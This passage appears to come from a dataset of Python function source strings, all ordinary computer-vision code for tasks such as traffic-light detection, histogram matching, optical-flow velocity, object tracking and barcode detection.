0.25])\n ax_annotation_info.set_axis_bgcolor('w')\n\n # Create the rows to be displayed in the annotations table.\n cell_text = []\n for c in _all_characteristics_:\n row = []\n cname = c.capitalize()\n if cname.startswith('Int'):\n cname = 'InternalStructure'\n\n row.append(cname)\n row.append(getattr(self,cname)())\n row.append(getattr(self,c))\n\n cell_text.append(row)\n\n annotation_info_table = ax_annotation_info.table(\n cellText=cell_text,\n loc='center', cellLoc='left', colWidths=[0.45,0.45,0.1]\n )\n\n # Again, remove cell borders.\n for cell in annotation_info_table.properties()['child_artists']:\n cell.set_color('w')\n\n ax_annotation_info.set_title('Annotation Info')\n ax_annotation_info.set_xticks([])\n ax_annotation_info.set_yticks([])\n\n # Add the checkbox for turning contours on / off.\n ax_contour_checkbox = fig.add_axes([0.1, 0.25, 0.1, 0.15])\n ax_contour_checkbox.set_axis_bgcolor('w')\n contour_checkbox = CheckButtons(ax_contour_checkbox,\n ('Show Contours',), (True,))\n contour_checkbox.is_checked = True\n\n # Add the widgets.\n ax_slice = fig.add_axes([0.1, 0.1, 0.3, 0.05])\n ax_slice.set_axis_bgcolor('w')\n txt = 'Z: %.3f'%float(images[current_slice].ImagePositionPatient[-1]) \n sslice = Slider(ax_slice,\n txt,\n 0,\n len(images)-1,\n valinit=current_slice,\n valfmt=u'Slice: %d')\n\n def update(_):\n # Update image itself.\n current_slice = int(sslice.val)\n img.set_data(images[current_slice].pixel_array)\n txt='Z: %.3f'%float(images[current_slice].ImagePositionPatient[-1])\n sslice.label.set_text(txt)\n if contour_checkbox.is_checked:\n for i,c in enumerate(contour_lines):\n flag = (index_of_contour[i] == current_slice)\n flag = flag and (current_slice >= min_slice)\n flag = flag and (current_slice <= max_slice)\n # Set contour visible if flag is True.\n c.set_visible(flag)\n else:\n for c in contour_lines: c.set_visible(False)\n fig.canvas.draw_idle()\n\n def update_contours(_):\n contour_checkbox.is_checked = not contour_checkbox.is_checked\n update(None) # update requires an argument.\n\n sslice.on_changed(update)\n contour_checkbox.on_clicked(update_contours)\n\n plt.show()", "def get_classification(self, image):\n #TODO implement light color prediction\n max_idx = 4\n with self.detection_graph.as_default():\n with tf.Session(graph=self.detection_graph) as sess:\n # Definite input and output Tensors for detection_graph\n image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')\n \n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')\n \n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n\n boxes = np.squeeze(boxes)\n scores = np.squeeze(scores)\n classes = np.squeeze(classes).astype(np.int32)\n min_score_thresh = .50\n # find majority light state\n counter = [0, 0, 0, 0, 0]\n for i in range(boxes.shape[0]):\n if scores is None or scores[i] > min_score_thresh:\n counter[classes[i]] += 1\n for i in range(1, 5):\n if counter[i] > counter[max_idx]:\n max_idx = i\n return self.classmap[max_idx]", "def generateHeatMask( im ):\n featref = computeFeatures(im)\n h,w,nbp = im.shape\n print(\"w:%d,h:%d\"%(w,h))\n heatMap = np.zeros((h,w,1), dtype=np.int8)\n black = [0,0,0]\n white = [255,255,255]\n rMaxDiff = 0\n for j in range(h):\n print(\"j:%d\" % j )\n for i in range(w):\n #~ print(\"i:%d\" % i )\n arDiff = []\n for color in [black,white]:\n #~ print(\"color:%s\" % color)\n imt = np.copy(im)\n \n # quite same time on my tablet !!! \n # (would have think the [] would be far fastest!)\n if 0:\n cv2.circle(imt, (i,j), 1, color )\n else:\n imt[j,i]=color\n if 0:\n cv2.imshow(\"imt\",imt)\n cv2.waitKey(1)\n #~ feat = computeFeatures(imt)\n #~ rDiff = diffFeatures(featref,feat)\n rDiff = mseFloat(im,imt)\n arDiff.append(rDiff)\n #~ print(rDiff)\n rDiff = max(arDiff)\n if rDiff > rMaxDiff:\n rMaxDiff = rDiff\n heatMap[j,i] = rDiff*10\n print(\"rMaxDiff: %5.3f\" % rMaxDiff )\n #~ print(dir(cv2))\n #~ heatMap = cv2.resize(heatMap,(w*2,h*2))\n cv2.namedWindow(\"heat\",cv2.CV_WINDOW_AUTOSIZE|cv2.WINDOW_NORMAL)\n cv2.imshow(\"heat\",heatMap)\n cv2.resizeWindow(\"heat\",600,480)\n cv2.waitKey(0)", "def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False):\n threshes = [0.5, 0.6]\n margin = 10\n threshold = np.max(image) * threshes[which_cam]\n im = image.transpose()\n\n x_len = len(im)\n peak_locs = np.zeros(x_len)\n peak_vals = np.zeros(x_len)\n\n ## Trap Peak Detection ##\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n peak_locs[i] = 0\n peak_vals[i] = 0\n else:\n peak_locs[i] = np.argmax(im[i])\n peak_vals[i] = max(im[i])\n\n ## Trap Range Detection ##\n first = True\n pos_first, pos_last = 0, 0\n left_pos = 0\n for i, p in enumerate(peak_vals):\n if p > threshold:\n left_pos = i\n elif left_pos != 0:\n if first:\n pos_first = (left_pos + i) // 2\n first = False\n pos_last = (left_pos + i) // 2\n left_pos = 0\n\n ## Separation Value ##\n separation = (pos_last - pos_first) / ntraps # In Pixels\n\n ## Initial Guesses ##\n means0 = np.linspace(pos_first, pos_last, ntraps).tolist()\n waists0 = (separation * np.ones(ntraps) / 2).tolist()\n ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()\n _params0 = [means0, waists0, ampls0, [0.06]]\n params0 = [item for sublist in _params0 for item in sublist]\n\n ## Fitting ##\n if verbose:\n print(\"Fitting...\")\n xdata = np.arange(x_len)\n popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0),\n xdata, peak_vals, p0=params0)\n if verbose:\n print(\"Fit!\")\n plt.figure()\n plt.plot(xdata, peak_vals) # Data\n if iteration:\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit\n plt.title(\"Iteration: %d\" % iteration)\n else:\n plt.title(\"Final Product\")\n\n plt.xlim((pos_first - margin, pos_last + margin))\n plt.legend([\"Data\", \"Guess\", \"Fit\"])\n plt.show(block=False)\n print(\"Fig_Newton\")\n trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps])\n return trap_powers", "def _connect_components_analysis(image):\n if len(image.shape) == 3:\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n else:\n gray_image = image\n\n return cv2.connectedComponentsWithStats(gray_image, connectivity=8, ltype=cv2.CV_32S)", "def do_stuff(self, net, meta):\n cv2_img = self.img_to_cv2(self.last_img)\n # Now we can use cv2 functions as the image is <type 'numpy.ndarray'>\n # rospy.loginfo(\"cv2_img: \" + str(type(cv2_img)))\n # Your OpenCV stuff\n # cv2_img = cv2.resize(cv2_img, (0,0), fx=0.25, fy=0.25) \n\n (rows,cols,channels) = cv2_img.shape\n # if cols > 60 and rows > 60 :\n # cv2.circle(cv2_img, (50,50), 10, 255)\n \n global x_old\n global no_meas_counter\n global est\n global cor\n global w\n global h\n \n\n r = darknet.detect(net, meta, cv2_img)\n # print(r)\n\n if not r:\n no_meas_counter += 1\n\n for i in r:\n if i[0].decode() == \"person\":\n x, y, w, h = i[2][0], i[2][1], i[2][2], i[2][3]\n xmin, ymin, xmax, ymax = darknet.convertBack(float(x), float(y), float(w), float(h))\n pt1 = (xmin, ymin)\n pt2 = (xmax, ymax)\n cv2.rectangle(cv2_img, pt1, pt2, (0, 255, 0), 2)\n cv2.putText(cv2_img, i[0].decode() + \" [\" + str(round(i[1] * 100, 2)) + \"]\", (pt1[0], pt1[1] + 20), cv2.FONT_HERSHEY_SIMPLEX, 1, [0, 255, 0], 4)\n \n global mp\n mp = np.array([[np.float32(x)],[np.float32(y)]])\n cor = kalman.correct(mp)\n no_meas_counter = 0\n\t\t\n\n else:\n no_meas_counter += 1\n \n # x_old = x\n\n # cv2.imshow(\"cv2_img\", cv2_img)\n # k = cv2.waitKey(1)\n # if k == 27:\n # cv2.destroyAllWindows()\n # exit()\n\n if no_meas_counter < 30:\n est = kalman.predict()\n msg = PolygonStamped()\n msg.header.stamp = rospy.Time.now()\n # msg.polygon.points = [Point32(x=x, y=y), Point32(x=cols, y=rows), Point32(x=w, y=h)]\n msg.polygon.points = [Point32(x=est[0], y=est[1]), Point32(x=cols, y=rows), Point32(x=w, y=h)] \n self.pub_yolo_detection.publish(msg)\n\n # cv2.imshow(\"Image window\", cv2_img)\n # cv2.waitKey(3)\n\n self.pub_images(cv2_img)\n self.is_new_img = False", "def visualize_detection(self, image):\n\t\tH, W, _ = image.shape\n\t\tpos_list = self.apply_detection(image)\n\t\tdetections = {}\n\t\thasDetection = False\n\t\tfor i, L in enumerate(pos_list):\n\t\t\ttext, coordinates = L[0], L[1]\n\t\t\tCOLOR = COLORS[text]\n\t\t\tfor x, y, w, h in coordinates:\n\t\t\t\t# prune bad homography points\n\t\t\t\tif x < 0 or y < 0 or x + w > W or \\\n\t\t\t\t y + h > H or w <= 1 or h <= 1:\n\t\t\t\t\tcontinue\n\t\t\t\t# add the detection to the dict for tracking\n\t\t\t\tdetections[self.num_detect] = (x, y, w, h)\n\t\t\t\tself.detection_index[self.num_detect] = (x, y, w, h, self.num_save, text)\n\t\t\t\tself.num_detect += 1\n\t\t\t\thasDetection = True\n\t\t\t\t# if the detection is human\n\t\t\t\tif text == 'face':\n\t\t\t\t\tgender = self.genderDetect.classify(image[y:y+h, x:x+w, :])\n\t\t\t\t\tgender = 'female' if gender[0] < 0.5 else 'male'\n\t\t\t\t\tcv2.putText(image, gender, (x + w // 2 -10, y + h + 15),\n\t\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.6, COLOR, 2, cv2.LINE_AA)\n\n\t\t\t\timage = cv2.rectangle(image, (x, y), (x + w, y + h), COLOR, 2)\n\t\t\t\tcv2.putText(image, text, (x, y - 5),\n\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.6, COLOR, 2, cv2.LINE_AA)\n\t\tif hasDetection:\n\t\t\tself.detection_frames[self.num_save] = detections\n\t\tself.num_save +=1\n\t\treturn image", "def cs4243_histmatch(ori_image, refer_image):\n \n ##your code here ###\n\n # get cdf of ori and ref image\n grey_level = 256\n ori_hist, ori_cum_hist, ori_res_image, ori_uni_hist = cs4243_histequ(ori_image, grey_level)\n ref_hist, ref_cum_hist, ref_res_image, ref_uni_hist = cs4243_histequ(refer_image, grey_level)\n \n # map each ori cdf to ref cdf and get the mapped index as matched grey level\n map_value = []\n for i in range(grey_level):\n ori_cdf = ori_cum_hist[i]\n matched_intensity = np.uint8(np.abs(ref_cum_hist - ori_cdf).argmin())\n map_value.append(matched_intensity)\n ##\n\n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = ori_image.shape\n res_image = np.zeros(ori_image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = map_value[ori_image[i,j]]\n \n res_hist = np.bincount(res_image.flatten(), minlength=256)\n \n return ori_hist, ref_hist, res_image, res_hist", "def observation(self, img):\r\n img = img[25:200]\r\n img = cv2.resize(img, self.img_size[1:])\r\n if not self.color:\r\n img = img.mean(-1, keepdims=True)\r\n\r\n return img.transpose([2, 0, 1]) / 255", "def perform_event_analysis():\n\n tol = 2.0 # Arcmin\n calib_on_colours = False\n\n params = get_args()\n\n log = start_log(params)\n\n (star_catalog,image_trios,catalog_header) = read_combined_star_catalog(params,log)\n\n lightcurves = read_lightcurves(params,log)\n\n target = find_target_data(params,star_catalog,lightcurves,image_trios,log)\n\n (source, blend) = calc_source_blend_params(params,log)\n\n source = calc_source_lightcurve(source, target, log)\n\n measure_photometric_source_colours(params,target,log)\n\n (det_idx, cat_idx, close_cat_idx) = index_valid_star_entries(star_catalog,\n target,tol,log,\n valid_cat=True)\n\n deltas = calibrate_instrumental_colour_colour_diagram(params,star_catalog,\n catalog_header,target,\n det_idx,cat_idx,close_cat_idx,\n log,\n calib=calib_on_colours)\n\n RC = localize_red_clump(star_catalog,close_cat_idx,log)\n\n analyse_colour_mag_diagrams(params,star_catalog,catalog_header,\n target, source,blend,RC,\n det_idx,cat_idx,close_cat_idx,log)\n\n RC = measure_RC_offset(params,RC,target,log)\n\n (target,source,blend) = calc_phot_properties(target, source, blend, RC, log)\n\n plot_colour_colour_diagram(params,star_catalog,catalog_header,\n target, source, blend, RC,\n det_idx,cat_idx,close_cat_idx, log)\n\n (source, blend) = match_source_blend_isochrones(params,source,blend,log)\n\n (source, blend) = calc_source_blend_ang_radii(source, blend, log)\n\n (source, blend) = calc_source_blend_physical_radii(source, blend, log)\n\n (source,blend) = calc_source_blend_distance(source, blend, RC, log)\n\n lens = calc_lens_parameters(params, source, RC, log)\n\n output_red_clump_data_latex(params,RC,log)\n\n output_source_blend_data_latex(params,source,blend,log)\n\n output_lens_parameters_latex(params,source,lens,log)", "def image_preprocessing(img):\n\n # Removing parasite data (sky, trees and front of the car)\n return img[60:-20, :, :]", "def detect_velocity(image):\n nonlocal prev, v_last\n curr_bgr = cv.warpPerspective(image, M, (160, 120))\n curr = cv.cvtColor(curr_bgr, cv.COLOR_BGR2GRAY)\n\n if prev is None:\n prev = curr\n v_last = 0.0\n return v_last, curr_bgr, np.zeros_like(image)\n\n flow = cv.calcOpticalFlowFarneback(\n prev, # Previous image\n curr, # Current image\n None, # Computed flow image that has the same size oas prev and type CV_32FC2.\n 0.5, # Specifies the image scale (<1) to build pyramids for each image.\n 3, # Number of pyramid layers including the initial image.\n 15, # winsize, averaging windows size.\n 3, # iterations, number of iterations the algorithm does at each pyramid level.\n 5, # standard deviation of the Gaussian that is used to smooth derivative\n 1.5,\n 0)\n\n mag, ang = cv.cartToPolar(flow[..., 0], flow[..., 1])\n\n v = mag * np.sin(ang)\n\n ######################\n ## Histogram for mag\n ar = np.arange(-20.0, 20.0, 0.50, dtype=np.float)\n his = np.histogram(v, bins=ar)\n\n for i, n in enumerate(his[0]):\n bgr = (255, 255, 0)\n if his[1][i] < 0:\n bgr = (0, 255, 255)\n\n #print('[{}] {} - {}'.format(i, n, his[1][i]))\n cv.rectangle( image, #curr_bgr,\n (i*2, HEIGHT),\n (i*2, HEIGHT - int(n / 10)),\n bgr, #(0, 255, 255),\n cv.FILLED)\n\n hsv = np.zeros_like(image)\n hsv[..., 0] = ang * 180 / np.pi / 2\n hsv[..., 1] = 255\n hsv[..., 2] = cv.normalize(np.abs(v), None, 0, 255, cv.NORM_MINMAX)\n hsv_bgr = cv.cvtColor(hsv, cv.COLOR_HSV2BGR)\n ##\n ######################\n\n v_abs = np.absolute(v)\n v = v[v_abs >= np.percentile(v_abs, VELOCITY_CUTOFF_PCT)]\n\n v_max = v_last + MAX_ACC\n v_min = v_last - MAX_ACC\n v = np.clip(v, v_min, v_max)\n if v.size > 0:\n v_avg = v.mean()\n else:\n if v_last > 0:\n v_avg = max(v_last - MAX_ACC, 0)\n elif v_last < 0:\n v_avg = min(v_last + MAX_ACC, 0)\n else:\n v_avg = 0\n\n prev = curr\n v_last = v_avg\n return v_last, curr_bgr, hsv_bgr", "def detect_sea_lions_in_image(filename,\n model,\n patch_h,\n patch_w,\n resize_image_patch_to_h, \n resize_image_patch_to_w,\n resize_mask_patch_to_h,\n resize_mask_patch_to_w,\n display_mask=False):\n\n train_image = cv2.imread(filename)\n image_patches_list = dhap.slice_the_image_into_patches(train_image, patch_h, patch_w)\n\n # Recombine the image from the patches (train_image.shape != image.shape)\n # bacause the size of the image is adjusted to be a multiple of patch_h and patch_w. \n image = dhap.combine_pathes_into_image(image_patches_list)\n\n if (display_mask == True):\n fig, ax = plt.subplots()\n cax = ax.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n cbar = fig.colorbar(cax)\n plt.axis(\"off\")\n plt.show() \n\n # Resize the patches to the ones used by the model.\n image_patches_list = dhap.resize_patches_in_patches_list(image_patches_list, \n resize_image_patch_to_h, \n resize_image_patch_to_w)\n\n mask_patches_list = apply_model_to_image_patches_list(image_patches_list, model)\n\n # The model outputs a (1,n) vertor. Reshape it to a matrix.\n mask_patches_list = reshape_patches_list(mask_patches_list,\n resize_mask_patch_to_h,\n resize_mask_patch_to_w)\n\n mask_patches_list = resized_image_patches_list = dhap.resize_patches_in_patches_list(mask_patches_list, \n patch_h, \n patch_w)\n\n mask = dhap.combine_pathes_into_mask(mask_patches_list)\n\n image = dhap.apply_mask(image, mask)\n\n if (display_mask == True):\n fig, ax = plt.subplots()\n cax = ax.imshow(mask)\n cbar = fig.colorbar(cax)\n plt.axis(\"off\")\n plt.show() \n\n\n if (display_mask == True):\n fig, ax = plt.subplots()\n cax = ax.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n cbar = fig.colorbar(cax)\n plt.axis(\"off\")\n plt.show() \n\n\n\n print(mask_patches_list[0][0].shape)\n\n\n #combine_pathes_into_image(patches_list", "def find_objects_in_image(self, image, visualize):\n self.select(image)\n\n for scan_region in self.scan_regions:\n self.set_scaling(scan_region[0])\n full, small = self.find_instances(image, scan_region[1], 0.5)\n if (visualize):\n fig = plt.figure(figsize=(30, 20))\n plt.imshow(small)\n plt.title(\"Scan region {} using scaling {}\".format(scan_region[1], scan_region[0]))\n plt.show()", "def GAN_COLOUR_FEATURE(image):\n import cv2\n import numpy as np\n \n \n img = cv2.imread(image)\n hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n ycc = cv2.cvtColor(img,cv2.COLOR_BGR2YCrCb)\n \n Feature = np.concatenate([cooccurence_3D_matrix(img, True),\n cooccurence_2D_matrix(hsv[:,:,0],True),\n cooccurence_2D_matrix(hsv[:,:,1],True),\n cooccurence_2D_matrix(ycc[:,:,1],True),\n cooccurence_2D_matrix(ycc[:,:,2],True)],\n axis = None)\n \n return Feature", "def traffic_light_detection(img_in, radii_range, noisy_image=False, max_x_offset=5):\n\n img = process_base_image(img_in, (7, 7))\n\n # find all the circles in an image using Hough Circles\n min_radii = min(radii_range)\n max_radii = max(radii_range)\n # the distance between the circles should be the smallest possible circles that can touch.\n min_dist = min_radii * 2 + 10\n\n # img, dp, min_dist, param1, param2, minRad, maxRad\n if noisy_image:\n circles = hough_circles(img, 1.55, min_dist, 20, 15, min_radii, max_radii)\n else:\n circles = hough_circles(img, 1.125, min_dist, 30, 20, min_radii, max_radii)\n\n if circles is None:\n return (0, 0), None\n else:\n # cleanup circles so its easier to use.\n circles = circles[0, :]\n # round the numbers of the array to uint16 values.\n circles = np.uint16(np.around(circles))\n\n if len(circles) < 3:\n return (1000, 1000), None\n else: # If there are more than 3 circles found, eliminate the outliers that shouldn't be detected.\n # sort the circles first by x, then by Radius value, then by Y value.\n circles = sorted(circles, key=lambda c: (c[0], c[2], c[1]))\n\n # since the traffic lights will be a group of 3 circles with a similar radius, then x value, then somewhat close\n # in y value, use a \"window\" type of sliding group to create groups of 3 circles that can then be compared\n # to each other to see if they would make up circles of a traffic light.\n circle_groups = []\n for c_idx in range(len(circles) - 2):\n circle_group = circles[c_idx: c_idx + 3] # build the group\n circle_groups.append(circle_group)\n\n circle_groups = np.array(circle_groups)\n # for each circle group found, need to figure out the group with the lowest overall standard deviation.\n # for each group, calculate the std deviations.\n group_deviations = np.array([circle_group_deviations(g) for g in circle_groups])\n\n most_similar_idx = np.argmin(group_deviations)\n final_circles = circle_groups[most_similar_idx]\n\n # if the circles aren't close to each other in the X direction, return\n # none since its not a traffic light.\n x_diffs = np.diff(final_circles[:, 0])\n if np.any(x_diffs >= max_x_offset):\n return (None, None), None\n\n # sort the circles from top down to allow color compare.\n circles = final_circles[np.argsort(final_circles[:, 1])] # sort by Y direction.\n # creating some names for clarity due to x, y being col, row.\n red_row, red_col, yellow_row, yellow_col, green_row, green_col = [\n circles[0][1],\n circles[0][0],\n circles[1][1],\n circles[1][0],\n circles[2][1],\n circles[2][0],\n ]\n\n # determine colors.\n state = 'yellow' # default state.\n cords = (yellow_col, yellow_row)\n\n red_color = np.array([0, 0, 255])\n green_color = np.array([0, 255, 0])\n\n # stop for false positive labels.\n if img_in[yellow_row, yellow_col][0] > 10:\n return (None, None), None\n\n if (img_in[red_row, red_col] == red_color).all():\n state = 'red'\n elif (img_in[green_row, green_col] == green_color).all():\n state = 'green'\n\n # print 'Color of TL midpoint is {}'.format(img_in[yellow_row, yellow_col])\n\n return cords, state", "def detect(img, template):\r\n\r\n #detect threshold\r\n args = parse_args()\r\n threshold=dictornary(args)\r\n\r\n # detect edges of image\r\n \"\"\"prewitt_x = [[1, 0, -1]] * 3\r\n prewitt_y = [[1] * 3, [0] * 3, [-1] * 3]\r\n img_x = task1.detect_edges(img, prewitt_x, False)\r\n img_y = task1.detect_edges(img, prewitt_y, False)\r\n img_norm = task1.edge_magnitude(img_x, img_y)\r\n\r\n task1.write_image(task1.normalize(img_norm), \".//img_norm.jpg\")\r\n\r\n # detect edges in template\r\n\r\n temp_x = task1.detect_edges(template, prewitt_x, False)\r\n temp_y = task1.detect_edges(template, prewitt_y, False)\r\n template_norm = task1.edge_magnitude(temp_x, temp_y)\r\n\r\n task1.write_image(task1.normalize(template_norm), \".//template_norm.jpg\") \"\"\"\r\n\r\n img_norm = task1.normalize(img)\r\n template_norm = task1.normalize(template)\r\n\r\n coordinates = []\r\n temp_h = len(template_norm)\r\n temp_w = len(template_norm[0])\r\n\r\n rows = len(img_norm)\r\n cols = len(img_norm[0])\r\n\r\n output = [[0 for x in range(len(img_norm[0]))] for y in range(len(img_norm))]\r\n cropped_img = [[0 for x in range(temp_w)] for y in range(temp_h)]\r\n\r\n for i in range(rows):\r\n for j in range(cols):\r\n\r\n if ((i +temp_h) < rows and (j + temp_w < cols)):\r\n cropped_img = utils.crop(img_norm, i, i + temp_h, j, j + temp_w)\r\n\r\n\r\n img_mul_temp = utils.elementwise_mul(cropped_img, template_norm)\r\n sum = 0\r\n # sum of every elemnet in img_mul_temp\r\n for p in range(temp_h):\r\n for q in range(temp_w):\r\n sum += img_mul_temp[p][q]\r\n\r\n # squaring every element in denominator of image\r\n square_img = utils.elementwise_mul(cropped_img, cropped_img)\r\n numsum_img = 0\r\n for d in range(len(cropped_img)):\r\n for e in range(len(cropped_img[0])):\r\n numsum_img += square_img[d][e]\r\n\r\n # squaring every element in denominator of template\r\n square_temp = utils.elementwise_mul(template_norm, template_norm)\r\n numsum_temp = 0\r\n for k in range(temp_h):\r\n for l in range(temp_w):\r\n numsum_temp += square_temp[k][l]\r\n\r\n denominator = np.sqrt((numsum_img * numsum_temp))\r\n\r\n if (denominator != 0):\r\n output[i][j] = (sum / denominator)\r\n if (output[i][j] > threshold):\r\n coordinates.append([i, j])\r\n\r\n # TODO: implement this function.\r\n # raise NotImplementedError\r\n return coordinates", "def get_classification(self, image):\n if self.correct_gamma:\n if self.gamma == 1.0:\n self.gamma = 0.6\n elif self.gamma == 0.6:\n self.gamma = 1.0\n image = self.adjust_gamma(image, self.gamma)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image_np = np.asarray(image, dtype=\"uint8\")\n image_np_expanded = np.expand_dims(image_np, axis=0)\n\n detected = False\n\n with self.detection_graph.as_default():\n (boxes, scores, classes, num) = self.sess.run(\n [self.detection_boxes, self.detection_scores, self.detection_classes, self.num_detections],\n feed_dict={self.image_tensor: image_np_expanded})\n boxes = np.squeeze(boxes)\n classes = np.squeeze(classes).astype(np.int32)\n scores = np.squeeze(scores)\n best_scores = []\n\n for idx, classID in enumerate(classes):\n if self.MODEL_NAME == 'ssdlite_mobilenet_v2_coco_2018_05_09':\n if classID == 10: # 10 is traffic light\n if scores[idx] > 0.10: #confidence level\n best_scores.append([scores[idx], idx, classID])\n detected = True\n else: # we tuned the model to classify only traffic lights\n if scores[idx] > 0.10: # confidence level\n best_scores.append([scores[idx], idx, classID])\n detected = True\n\n tl_index = TrafficLight.UNKNOWN\n if detected:\n best_scores.sort(key=lambda tup: tup[0], reverse=True)\n\n best_score = best_scores[0]\n rospy.logdebug(\"number of TL found %d, best score: %f, color: %f\", len(best_scores), best_score[0], best_score[2])\n nbox = boxes[best_score[1]]\n\n height = image.shape[0]\n width = image.shape[1]\n\n box = np.array([nbox[0]*height, nbox[1]*width, nbox[2]*height, nbox[3]*width]).astype(int)\n box_height = box[2] - box[0]\n box_width = box[3] - box[1]\n ratio = float(box_height)/float(box_width)\n rospy.logdebug(\"ratio: %f\", ratio)\n if ratio >= 2.0 and ratio < 3.0: #started from 2.4\n tl_cropped = image[box[0]:box[2], box[1]:box[3]]\n tl_color, tl_index = self.get_color(tl_cropped)\n #color = ['RED', 'YELLOW', 'GREEN', 'UNKNOWN']\n #tl_index = best_score[2]\n #tl_color = color[tl_index]\n #augment image with detected TLs\n cv2.rectangle(image, (box[1], box[0]), (box[3], box[2]), (0, 255, 0), 2)\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_color = (255, 255, 255)\n cv2.putText(image, tl_color, (box[1], box[0]), font, 2.0, font_color, lineType=cv2.LINE_AA)\n return image, tl_index", "def describe(image):\n needle = cv2.imread(image, 0)\n orb = cv2.ORB()\n keypoints, description = orb.detectAndCompute(needle, None)\n print(keypoints)\n print(description)\n return keypoints, description", "def main():\n stats = []\n start = timer()\n\n for file_name in get_dataset():\n\n # load image and ground truth detection mask\n img = cv2.imread(settings.PATH + file_name)\n ground_truth_mask = cv2.imread(settings.PATH_GT_MASKS + file_name)\n\n # Find list of barcode regions (rotated rectangle) within image\n barcode_regions, debug_img = find_barcodes(img)\n barcode_regions_mask = np.zeros(img.shape, np.uint8)\n barcode_images = None\n result = []\n\n # Decode barcode regions\n for barcode_region in barcode_regions:\n\n # Decode barcode image\n barcode_img = barcode_region.extract_from(img)\n barcode_mask = barcode_region.get_mask(img)\n debug_img = barcode_region.draw(debug_img)\n\n # Combine masks from multiple detected regions\n barcode_regions_mask += barcode_mask\n\n # Decode barcode\n decoded = pyzbar.decode(barcode_img)\n\n # Keep result for logging\n data = \", \".join([d.data.decode(\"utf-8\") for d in decoded])\n result.append({\"data\": data, \"region\": barcode_region.json()})\n\n if settings.SHOW_IMAGE:\n barcode_images = img_concat(barcode_images, barcode_img)\n\n # Jaccard_accuracy = intersection over union of the two binary masks\n jaccard_accuracy = 0\n if ground_truth_mask is not None:\n r = barcode_regions_mask.max(axis=-1).astype(bool)\n u = ground_truth_mask.max(axis=-1).astype(bool)\n jaccard_accuracy = float((r & u).sum()) / (r | u).sum()\n stats.append(jaccard_accuracy)\n\n # Log result\n logger.info(\n \"Image processed\",\n file_name=file_name,\n jaccard_accuracy=jaccard_accuracy,\n success=jaccard_accuracy > 0.5,\n result=result,\n )\n\n # In debug mode show visualization of detection algorithm\n if settings.SHOW_IMAGE:\n\n # Add alpha channel\n debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2BGRA)\n if barcode_images is not None:\n barcode_images = cv2.cvtColor(barcode_images, cv2.COLOR_BGR2BGRA)\n\n # Overlay error mask\n # Pixel-wise difference between ground truth and detected barcodes\n if ground_truth_mask is not None:\n error_img = np.zeros(debug_img.shape, np.uint8)\n error_img[r & u] = np.array([0, 0, 0, 0], dtype=np.uint8)\n error_img[np.logical_xor(r, u)] = np.array(\n [0, 0, 255, 1], dtype=np.uint8\n )\n debug_img = cv2.addWeighted(debug_img, 1, error_img, 0.5, 0)\n\n # Append barcode pictures to the right\n debug_img = img_concat(debug_img, barcode_images, axis=1)\n\n # Show visualization\n cv2.namedWindow(\"img\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"img\", debug_img)\n cv2.waitKey(0)\n\n # Calculate final stats\n end = timer()\n accuracy = np.array(stats).mean()\n successes = np.where(np.array(stats) > 0.5)[0]\n logger.info(\n \"Final stats\",\n accuracy=accuracy,\n detection_rate=float(len(successes)) / len(stats),\n fps=len(stats) / (end - start),\n )", "def draw_boxes_cars(img, vehicles_instance):\n\n for car_number in range(1, vehicles_instance.number_of_found_cars+1):\n # Find pixels with each car_number label value\n nonzero = (vehicles_instance.binary_map == car_number).nonzero()\n\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n\n # Draw the box on the image\n cv2.rectangle(img, bbox[0], bbox[1], (0, 0, 255), 6)\n\n return img", "def __image_pipeline(self, img):\n \n ##### Lane finding pipeline #######\n resized = self.__resize_image(img)\n undistorted = self.__correct_distortion(resized)\n warped = self.__warp_image_to_biv(undistorted)\n thresholded = self.__threshold_image(warped)\n lines = self.__get_lane_lines(thresholded)\n lane_img = self.__draw_lane_lines(undistorted, thresholded, include_stats=True)\n\n\n ##### Vehicle Tracking pipeline #####\n\n hot_windows = self.windFinder.get_hot_windows(img)\n car_boxes, wrap_img = self.vTracker.image_pipeline(img, hot_windows,\n return_img=False) \n # img = cv2.addWeighted(img, 1, wrap_img, 0.5, 0)\n result = self.__draw_boxes(lane_img, car_boxes)\n\n return result", "def test_find_tfl_lights(image_path, json_path=None, fig_num=None):\n image = np.array(Image.open(image_path))\n if json_path is None:\n objects = None\n else:\n gt_data = json.load(open(json_path))\n what = ['traffic light']\n objects = [o for o in gt_data['objects'] if o['label'] in what]\n\n 